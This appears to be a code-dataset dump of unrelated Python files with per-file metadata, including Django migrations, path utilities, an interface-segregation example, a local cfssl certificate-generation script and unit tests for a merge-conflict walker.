                                   to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
            ],
            options={
                'db_table': 'validation_type',
            },
        ),
        migrations.CreateModel(
            name='ValidationRegex',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
                ('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
                ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                              related_name='custom_column_validationregex_creator',
                                              to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
                ('last_modified_by',
                 models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                   related_name='custom_column_validationregex_last_modified',
                                   to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
            ],
            options={
                'db_table': 'validation_regex',
            },
        ),
        migrations.CreateModel(
            name='CustomColumnType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
                ('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
                ('type', models.TextField(blank=True, null=True)),
                ('is_key', models.BooleanField(default=True)),
                ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                              related_name='custom_column_customcolumntype_creator',
                                              to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
                ('last_modified_by',
                 models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                   related_name='custom_column_customcolumntype_last_modified',
                                   to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
            ],
            options={
                'db_table': 'custom_column_type',
            },
        ),
        migrations.CreateModel(
            name='ColumnValidation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
                ('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
                ('value', models.CharField(blank=True, max_length=255, null=True)),
                ('regex', models.CharField(blank=True, max_length=255, null=True)),
                ('is_protect', models.BooleanField(default=False)),
                ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                              related_name='custom_column_columnvalidation_creator',
                                              to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
                ('custom_column_type',
                 models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                   to='custom_column.CustomColumnType')),
                ('last_modified_by',
                 models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                   related_name='custom_column_columnvalidation_last_modified',
                                   to=settings.AUTH_USER_MODEL, verbose_name='Last modified by')),
                ('validation_regex',
                 models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                   to='custom_column.ValidationRegex')),
                ('validation_type',
                 models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                   to='custom_column.ValidationType')),
            ],
            options={
                'db_table': 'column_validation',
            },
        ),
    ]
| 60.472222 | 115 | 0.572347 | 643 | 6,531 | 5.584759 | 0.121306 | 0.057923 | 0.066834 | 0.073517 | 0.829852 | 0.825397 | 0.825397 | 0.825397 | 0.825397 | 0.813144 | 0 | 0.007588 | 0.313888 | 6,531 | 107 | 116 | 61.037383 | 0.793796 | 0.007043 | 0 | 0.584158 | 1 | 0 | 0.167669 | 0.063088 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029703 | 0 | 0.069307 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
97919e28f17c77969d3ea009fbebd48dd3e51dab | 2,030 | py | Python | src/scribe_data/load/update_utils.py | andrewtavis/CC0-Mockups | 36020ff94c1ba34e5801ff405a0d42686ee044a1 | [
"CC0-1.0"
] | null | null | null | src/scribe_data/load/update_utils.py | andrewtavis/CC0-Mockups | 36020ff94c1ba34e5801ff405a0d42686ee044a1 | [
"CC0-1.0"
] | null | null | null | src/scribe_data/load/update_utils.py | andrewtavis/CC0-Mockups | 36020ff94c1ba34e5801ff405a0d42686ee044a1 | [
"CC0-1.0"
] | null | null | null | """
Data Utils
----------
Utility functions for data updates.
"""
def get_path_from_format_file():
    """
    Returns the directory path from a data formatting file to scribe-org.
    """
    return "../../../../../.."


def get_path_from_update_data():
    """
    Returns the directory path from update_data.py to scribe-org.
    """
    return "../../../.."


def get_ios_data_path(language: str, word_type: str):
    """
    Returns the path to the data json of the iOS app given a language and word type.

    Parameters
    ----------
    language : str
        The language the path should be returned for.

    word_type : str
        The type of word that should be accessed in the path.

    Returns
    -------
    The path to the data json for the given language and word type.
    """
    return f"/Scribe-iOS/Keyboards/LanguageKeyboards/{language}/Data/{word_type}.json"


def get_android_data_path(language: str, word_type: str):
    """
    Returns the path to the data json of the Android app given a language and word type.

    Parameters
    ----------
    language : str
        The language the path should be returned for.

    word_type : str
        The type of word that should be accessed in the path.

    Returns
    -------
    The path to the data json for the given language and word type.
    """
    return (
        f"/Scribe-Android/Keyboards/LanguageKeyboards/{language}/Data/{word_type}.json"
    )


def get_desktop_data_path(language: str, word_type: str):
    """
    Returns the path to the data json of the desktop app given a language and word type.

    Parameters
    ----------
    language : str
        The language the path should be returned for.

    word_type : str
        The type of word that should be accessed in the path.

    Returns
    -------
    The path to the data json for the given language and word type.
    """
    return f"/Scribe-Desktop/scribe/language_guis/{language}/data/{word_type}.json"
| 25.375 | 88 | 0.619704 | 276 | 2,030 | 4.456522 | 0.17029 | 0.097561 | 0.053659 | 0.058537 | 0.852846 | 0.789431 | 0.752033 | 0.752033 | 0.752033 | 0.660976 | 0 | 0 | 0.271429 | 2,030 | 79 | 89 | 25.696203 | 0.831643 | 0.607389 | 0 | 0 | 0 | 0 | 0.40429 | 0.358086 | 0 | 0 | 0 | 0 | 0 | 1 | 0.416667 | false | 0 | 0 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
97cf021e72afbc73cfc6431d29e5b50bcb7c34ad | 1,772 | py | Python | SOLID LAB/04_ISP/entertainment_system.py | borko81/SU_OOP_2021 | 8c38682bd4a2b032ca09f85b0a579be152223a59 | [
"MIT"
] | null | null | null | SOLID LAB/04_ISP/entertainment_system.py | borko81/SU_OOP_2021 | 8c38682bd4a2b032ca09f85b0a579be152223a59 | [
"MIT"
] | null | null | null | SOLID LAB/04_ISP/entertainment_system.py | borko81/SU_OOP_2021 | 8c38682bd4a2b032ca09f85b0a579be152223a59 | [
"MIT"
] | null | null | null | # class EntertainmentDevice:
# def connect_to_device_via_hdmi_cable(self, device): pass
#
# def connect_to_device_via_rca_cable(self, device): pass
#
# def connect_to_device_via_ethernet_cable(self, device): pass
#
# def connect_device_to_power_outlet(self, device): pass
#
from abc import ABC, abstractmethod
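
# The fat EntertainmentDevice interface above is split into the small role
# interfaces below, following the Interface Segregation Principle (ISP).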

class RcaConector(ABC):
    @abstractmethod
    def connect_to_device_via_rca_cable(self, device):
        pass


class HdmiConnector(ABC):
    @abstractmethod
    def connect_to_device_via_hdmi_cable(self, device):
        pass


class EthernetConnector(ABC):
    @abstractmethod
    def connect_to_device_via_ethernet_cable(self, device):
        pass


class PowerConnector(ABC):
    @abstractmethod
    def connect_device_to_power_outlet(self, device):
        pass


class Television(RcaConector, HdmiConnector):
    def connect_to_device_via_rca_cable(self, device):
        pass

    def connect_to_game_console(self, game_console):
        self.connect_to_device_via_hdmi_cable(game_console)

    def connect_to_device_via_hdmi_cable(self, device):
        pass


class dvd_player(HdmiConnector, PowerConnector):
    def connect_to_device_via_hdmi_cable(self, device):
        pass

    def connect_device_to_power_outlet(self, device):
        pass


class GameConsole(Television, EthernetConnector):
    def connect_to_device_via_rca_cable(self, device):
        pass

    def connect_to_router(self, router):
        self.connect_to_device_via_ethernet_cable(router)

    def connect_to_device_via_ethernet_cable(self, device):
        pass


class Router(EthernetConnector, PowerConnector):
    def connect_to_device_via_ethernet_cable(self, device):
        pass

    def connect_device_to_power_outlet(self, device):
        pass
| 24.273973 | 66 | 0.743228 | 227 | 1,772 | 5.387665 | 0.132159 | 0.147179 | 0.183156 | 0.206051 | 0.748978 | 0.738348 | 0.668029 | 0.626329 | 0.626329 | 0.626329 | 0 | 0 | 0.188488 | 1,772 | 72 | 67 | 24.611111 | 0.850487 | 0.152935 | 0 | 0.682927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.341463 | false | 0.292683 | 0.02439 | 0 | 0.560976 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
8ada2dd557654c476f4f3583a67fa5f55f1adb13 | 135 | py | Python | tests/mock_request.py | pekingPow/us-congress-pizza-flag-tracker | 9e23f4082a83a63c5ed71658cc8aab7d99ad2f01 | [
"CC0-1.0"
] | null | null | null | tests/mock_request.py | pekingPow/us-congress-pizza-flag-tracker | 9e23f4082a83a63c5ed71658cc8aab7d99ad2f01 | [
"CC0-1.0"
] | null | null | null | tests/mock_request.py | pekingPow/us-congress-pizza-flag-tracker | 9e23f4082a83a63c5ed71658cc8aab7d99ad2f01 | [
"CC0-1.0"
] | null | null | null | class mock_request:
mock_request_json = {}
@classmethod
def get_json(cls):
return mock_request.mock_request_json
| 16.875 | 45 | 0.696296 | 17 | 135 | 5.117647 | 0.529412 | 0.505747 | 0.344828 | 0.505747 | 0.597701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237037 | 135 | 7 | 46 | 19.285714 | 0.84466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
8af264a3e799a254be8b4b84e540b9659091cac7 | 75 | py | Python | test/__init__.py | elyashiv3839/compare_objects | 22f40a7c91428623176dd68235b93c93efe22215 | [
"MIT"
] | null | null | null | test/__init__.py | elyashiv3839/compare_objects | 22f40a7c91428623176dd68235b93c93efe22215 | [
"MIT"
] | null | null | null | test/__init__.py | elyashiv3839/compare_objects | 22f40a7c91428623176dd68235b93c93efe22215 | [
"MIT"
] | null | null | null | from . import test_CompareObjects
from . import test_CompareObjectsWithInfo | 37.5 | 41 | 0.88 | 8 | 75 | 8 | 0.625 | 0.3125 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093333 | 75 | 2 | 41 | 37.5 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8af4aa4af57e35a9fa7d554d1c262ca010d3b2ba | 1,336 | py | Python | conf/mod_keyless/gencert.py | fate0/bfe | bb034bca3711dfaa93f5c6f8aa408a68be58db13 | [
"Apache-2.0"
] | 4 | 2020-08-07T01:51:47.000Z | 2022-02-01T01:08:21.000Z | conf/mod_keyless/gencert.py | fate0/bfe | bb034bca3711dfaa93f5c6f8aa408a68be58db13 | [
"Apache-2.0"
] | null | null | null | conf/mod_keyless/gencert.py | fate0/bfe | bb034bca3711dfaa93f5c6f8aa408a68be58db13 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python
import os
os.system("mkdir -p pub")
os.system("mkdir -p key")
os.system("cfssl gencert -initca json/ca_csr.json |cfssljson -bare ca")
print("generate keyless server client cert")
os.system('cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="www.keyless.com" -hostname="www.keyless.com" -config json/signing.json -profile client json/csr-ecdsa.json |cfssljson -bare client')
os.system('cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="www.keyless.com" -hostname="www.keyless.com" -config json/signing.json -profile server json/csr-ecdsa.json |cfssljson -bare server')
print("generate www certs")
for i in range(0, 10, 2):
    domain = f"www.{i}.com"
    os.system(f'cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="{domain}" -hostname="{domain}" -config json/signing.json -profile server json/csr-ecdsa.json |cfssljson -bare {domain}')
    os.system(f'mv {domain}-key.pem key/{domain}.key')
    os.system(f'mv {domain}.pem pub/{domain}.crt')

for i in range(1, 10, 2):
    domain = f"www.{i}.com"
    os.system(f'cfssl gencert -ca ca.pem -ca-key ca-key.pem -cn="{domain}" -hostname="{domain}" -config json/signing.json -profile server json/csr-rsa.json |cfssljson -bare {domain}')
    os.system(f'mv {domain}-key.pem key/{domain}.key')
    os.system(f'mv {domain}.pem pub/{domain}.crt')
os.system('rm *.csr') | 46.068966 | 192 | 0.693114 | 230 | 1,336 | 4.021739 | 0.213043 | 0.103784 | 0.058378 | 0.069189 | 0.755676 | 0.755676 | 0.724324 | 0.724324 | 0.724324 | 0.724324 | 0 | 0.006814 | 0.121257 | 1,336 | 29 | 193 | 46.068966 | 0.78109 | 0.015719 | 0 | 0.315789 | 1 | 0.210526 | 0.753612 | 0.073004 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c11fe8345d245bd4037122e08febc68fd259ae0a | 123 | py | Python | docs/tests/E1132.py | mrfyda/codacy-pylint-python3 | e360f6c0407edebe274835d3a881d67e96adf8ba | [
"Apache-2.0"
] | 17 | 2016-01-26T13:30:04.000Z | 2022-03-06T21:11:42.000Z | docs/tests/E1132.py | mrfyda/codacy-pylint-python3 | e360f6c0407edebe274835d3a881d67e96adf8ba | [
"Apache-2.0"
] | 50 | 2019-08-14T16:14:45.000Z | 2022-03-31T11:00:50.000Z | docs/tests/E1132.py | mrfyda/codacy-pylint-python3 | e360f6c0407edebe274835d3a881d67e96adf8ba | [
"Apache-2.0"
] | 15 | 2015-11-18T12:18:50.000Z | 2021-01-17T22:21:41.000Z | ##Patterns: E1132
def test(a, b):
    return a, b
test(1, 24)
test(1, b=24, **{})
##Err: E1132
test(1, b=24, **{'b': 24})
| 13.666667 | 26 | 0.520325 | 24 | 123 | 2.666667 | 0.416667 | 0.234375 | 0.1875 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191919 | 0.195122 | 123 | 8 | 27 | 15.375 | 0.454545 | 0.203252 | 0 | 0 | 0 | 0 | 0.010638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
c18c32caf29b5794392c400b25240e853ca7b0f5 | 45 | py | Python | stackchat/cli/web/urls.py | jeremybanks/ChatExchange | e350de944d0f221a9b2afc545bf60ae309e402b6 | [
"Apache-2.0"
] | 3 | 2017-12-27T02:40:06.000Z | 2018-04-21T00:28:31.000Z | stackchat/cli/web/urls.py | jeremybanks/ChatExchange | e350de944d0f221a9b2afc545bf60ae309e402b6 | [
"Apache-2.0"
] | 1 | 2017-12-11T22:45:13.000Z | 2020-09-04T17:49:41.000Z | stackchat/cli/web/urls.py | jeremybanks/ChatExchange | e350de944d0f221a9b2afc545bf60ae309e402b6 | [
"Apache-2.0"
] | 1 | 2018-05-08T22:17:58.000Z | 2018-05-08T22:17:58.000Z | from .views import _get_routes as get_routes
| 22.5 | 44 | 0.844444 | 8 | 45 | 4.375 | 0.75 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 45 | 1 | 45 | 45 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c18ef8af6f5917b2d6cd69fc41c157598e307b38 | 92 | py | Python | utils/tokens.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/tokens.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/tokens.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | from nltk.tokenize import word_tokenize
def word_tokens(row):
return word_tokenize(row) | 23 | 39 | 0.804348 | 14 | 92 | 5.071429 | 0.642857 | 0.338028 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 92 | 4 | 40 | 23 | 0.8875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
c1a9588eaee780b3d914eb6e41f8a16e3c667a07 | 1,416 | py | Python | dietgenerator/migrations/0004_auto_20201121_1752.py | sgdiosdado/diet-generator | b79cd16a3ef2bbece526892fd30e0e3ba33bc0bf | [
"MIT"
] | null | null | null | dietgenerator/migrations/0004_auto_20201121_1752.py | sgdiosdado/diet-generator | b79cd16a3ef2bbece526892fd30e0e3ba33bc0bf | [
"MIT"
] | null | null | null | dietgenerator/migrations/0004_auto_20201121_1752.py | sgdiosdado/diet-generator | b79cd16a3ef2bbece526892fd30e0e3ba33bc0bf | [
"MIT"
] | null | null | null | # Generated by Django 3.1.3 on 2020-11-21 17:52
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('dietgenerator', '0003_auto_20201121_1748'),
    ]

    operations = [
        migrations.AlterField(
            model_name='food',
            name='calories',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=8, null=True),
        ),
        migrations.AlterField(
            model_name='food',
            name='carbohidrates',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
        migrations.AlterField(
            model_name='food',
            name='cholesterol',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
        migrations.AlterField(
            model_name='food',
            name='fats',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
        migrations.AlterField(
            model_name='food',
            name='protein',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
        migrations.AlterField(
            model_name='food',
            name='sodium',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
    ]
| 32.181818 | 93 | 0.587571 | 149 | 1,416 | 5.442953 | 0.315436 | 0.147965 | 0.184957 | 0.21455 | 0.745993 | 0.745993 | 0.70037 | 0.70037 | 0.644883 | 0.644883 | 0 | 0.042914 | 0.292373 | 1,416 | 43 | 94 | 32.930233 | 0.766467 | 0.03178 | 0 | 0.621622 | 1 | 0 | 0.07962 | 0.016801 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1b31d34f6ca08a60d1783237c402e2b4547c651 | 9,908 | py | Python | tests/_amt_utils_test.py | xgouchet/AutoMergeTool | d63c057440a99e868e5eb25720f8d89640112f04 | [
"Apache-2.0"
] | 41 | 2017-04-10T10:12:32.000Z | 2022-02-11T09:34:43.000Z | tests/_amt_utils_test.py | xgouchet/AutoMergeTool | d63c057440a99e868e5eb25720f8d89640112f04 | [
"Apache-2.0"
] | 14 | 2017-02-17T09:58:57.000Z | 2018-02-12T14:38:51.000Z | tests/_amt_utils_test.py | xgouchet/ArachneMergeTool | d63c057440a99e868e5eb25720f8d89640112f04 | [
"Apache-2.0"
] | 5 | 2017-04-11T13:03:20.000Z | 2021-06-23T08:41:10.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import filecmp
import unittest
from automergetool.amt_utils import *
CW_PATH = 'tests/data/conflict_walker/{0}.txt'
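
# Canned conflict bodies: RESOLUTION marks a conflict as solved, REWRITE replaces its
# content while leaving the conflict markers (and thus the conflict itself) in place.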
RESOLUTION = "Nunc quis interdum nunc. Praesent mollis risus enim, at elementum quam finibus ut.\n"
REWRITE = ("<<<<<<< LOCAL\n"
           + "Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus. Donec vitae sapien ut \n"
           + "|||||||\n"
           + "Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus. Donec vitae sapien ut \n"
           + "=======\n"
           + ">>>>>>> REMOTE\n"
           + "libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet \n"
           + "<<<<<<< LOCAL\n"
           + "|||||||\n"
           + "nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc,\n"
           + "=======\n"
           + "nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc,\n"
           + ">>>>>>> REMOTE\n"
           + "Nunc quis interdum nunc. Praesent mollis risus enim, at elementum quam finibus ut.\n")


class ConflictTest(unittest.TestCase):
    def test_no_conflicts(self):
        """Tests a walker against a file without conflicts"""
        # Given a file to merge
        file = CW_PATH.format('no_conflicts')
        walker = ConflictsWalker(file, 'test', REPORT_NONE, False)

        # When walking the conflicts
        self.assertFalse(walker.has_more_conflicts())
        walker.end(False)

        # Then check the output
        self.assertTrue(filecmp.cmp(walker.merged, file))
        self.assertEqual(walker.get_merge_status(), SUCCESS)
        os.remove(walker.merged)

    def test_single_conflict_unsolved(self):
        """Tests a walker against a file with a single conflict, without solving it"""
        # Given a file to merge
        file = CW_PATH.format('single_conflict')
        walker = ConflictsWalker(file, 'test', REPORT_NONE, False)

        # When walking the conflicts
        self.assertTrue(walker.has_more_conflicts())
        self.assertFalse(walker.has_more_conflicts())
        walker.end(False)

        # Then check the output
        self.assertTrue(filecmp.cmp(walker.merged, file))
        self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
        os.remove(walker.merged)

    def test_single_conflict_rewritten(self):
        """Tests a walker against a file with a single conflict, rewriting it without marking it solved"""
        # Given a file to merge
        file = CW_PATH.format('single_conflict')
        walker = ConflictsWalker(file, 'test', REPORT_NONE, False)

        # When walking the conflicts
        self.assertTrue(walker.has_more_conflicts())
        conflict = walker.next_conflict()
        conflict.rewrite(RESOLUTION)
        self.assertFalse(walker.has_more_conflicts())
        walker.end(False)

        # Then check the output
        self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('single_conflict_resolved')))
        self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
        os.remove(walker.merged)

    def test_single_conflict_solved(self):
        """Tests a walker against a file with a single conflict, and solving it"""
        # Given a file to merge
        file = CW_PATH.format('single_conflict')
        walker = ConflictsWalker(file, 'test', REPORT_NONE, False)

        # When walking the conflicts
        self.assertTrue(walker.has_more_conflicts())
        conflict = walker.next_conflict()
        conflict.resolve(RESOLUTION)
        self.assertFalse(walker.has_more_conflicts())
        walker.end(False)

        # Then check the output
        self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('single_conflict_resolved')))
        self.assertEqual(walker.get_merge_status(), SUCCESS)
        os.remove(walker.merged)
def test_three_conflicts_half_solved_with_full_report(self):
"""Tests a walker against a file with three conflicts, and solving one of them"""
# Given a file to merge
file = CW_PATH.format('three_conflicts')
walker = ConflictsWalker(file, 'test', REPORT_FULL, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.resolve(RESOLUTION)
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict() # not solved
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.rewrite(REWRITE)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('three_conflicts_half_solved')))
self.assertTrue(
filecmp.cmp(file + '.test-report',
CW_PATH.format('three_conflicts_half_solved') + '.test-full-report'))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_three_conflicts_half_solved_with_solved_report(self):
"""Tests a walker against a file with three conflicts, and solving one of them"""
# Given a file to merge
file = CW_PATH.format('three_conflicts')
walker = ConflictsWalker(file, 'test', REPORT_SOLVED, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.resolve(RESOLUTION)
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict() # not solved
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.rewrite(REWRITE)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('three_conflicts_half_solved')))
self.assertTrue(
filecmp.cmp(file + '.test-report',
CW_PATH.format('three_conflicts_half_solved') + '.test-solved-report'))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_three_conflicts_half_solved_with_unsolved_report(self):
"""Tests a walker against a file with three conflicts, and solving one of them"""
# Given a file to merge
file = CW_PATH.format('three_conflicts')
walker = ConflictsWalker(file, 'test', REPORT_UNSOLVED, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.resolve(RESOLUTION)
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict() # not solved
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.rewrite(REWRITE)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('three_conflicts_half_solved')))
self.assertTrue(
filecmp.cmp(file + '.test-report',
CW_PATH.format('three_conflicts_half_solved') + '.test-unsolved-report'))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_missing_base_side(self):
"""Tests a walker against a file with conflicts without the `diff3` conflict style"""
# Given a file to merge
file = CW_PATH.format('missing_base')
walker = ConflictsWalker(file, '', REPORT_NONE)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_invalid_conflict_section_1(self):
"""Tests a walker against a file with invalid conflict section"""
# Given a file to merge
file = CW_PATH.format('invalid_conflict_1')
walker = ConflictsWalker(file, '', REPORT_NONE)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_invalid_conflict_section_2(self):
"""Tests a walker against a file with invalid conflict section"""
# Given a file to merge
file = CW_PATH.format('invalid_conflict_2')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_invalid_conflict_section_3(self):
